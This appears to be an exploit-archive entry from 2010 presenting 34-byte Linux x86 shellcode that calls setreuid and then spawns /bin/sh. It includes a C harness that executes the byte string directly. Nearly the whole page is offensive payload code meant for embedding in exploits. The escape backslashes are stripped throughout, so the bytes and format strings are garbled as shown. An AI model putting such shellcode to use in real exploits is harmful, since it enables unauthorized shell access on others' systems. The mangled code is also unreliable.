[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : 34 bytes setreud(getuid(), getuid()) & execve("/bin/sh") Shellcode
# Published : 2010-04-22
# Author : Magnefikko
# Previous Title : Linux x86 polymorphic forkbombe - 30 bytes
# Next Title : Linux x86 forkbombe


#include <stdio.h>
#include <string.h>

/*
	by Magnefikko
	14.04.2010
	magnefikko@gmail.com
	promhyl.oz.pl
	Subgroup: #PRekambr
	Name: 34 bytes setreud(getuid(), getuid()) & execve("/bin/sh") shellcode
	Platform: Linux x86
	
	setreuid(getuid(), getuid());
	execve("/bin/sh");	

	gcc -Wl,-z,execstack filename.c

	shellcode:

x6ax18x58xcdx80x50x50x5bx59x6ax46x58xcdx80x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x99x31xc9xb0x0bxcdx80

*/


int main(){
	char shell[] =
"x6ax18x58xcdx80x50x50x5bx59x6ax46x58xcdx80x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x99x31xc9xb0x0bxcdx80";
	printf("by Magnefikkonmagnefikko@gmail.comnpromhyl.oz.plnnstrlen(shell)
= %dn", strlen(shell));
	(*(void (*)()) shell)();
}